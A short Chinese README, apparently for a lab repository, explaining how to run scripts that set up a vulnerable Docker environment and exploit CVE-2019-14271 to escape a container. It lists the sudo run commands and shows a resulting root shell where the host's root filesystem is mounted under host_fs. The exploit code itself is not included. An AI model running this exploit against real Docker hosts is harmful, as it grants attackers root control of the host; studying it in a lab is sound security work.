一个方便且省时的自动脚本,用于搭建环境并利用它。
https://github.com/Metarget/metarget
https://github.com/Metarget/metarget/tree/master/writeups_cnv/docker-cve-2019-14271
https://github.com/thomasyang1207/Exploits/tree/master/CVE_2019_14271
chmod 777 Exploit.sh
chmod 777 Install_env.sh
sudo ./Install_env.sh
sudo ./Exploit.sh
如果镜像已构建,只需运行
Exploit.sh即可重复使用。
现在你已经进入了容器 cve-14271,并看到:
root@d9b5a334a0e9:/# ls
bin breakout home lib32 logs opt run sys var
boot dev host_fs lib64 media proc sbin tmp
break_logs etc lib libx32 mnt root srv usr
进入 host_fs,你会发现主机的根目录已经挂载在这里,你已成功逃逸。你可以以主机上的 root 用户身份操作。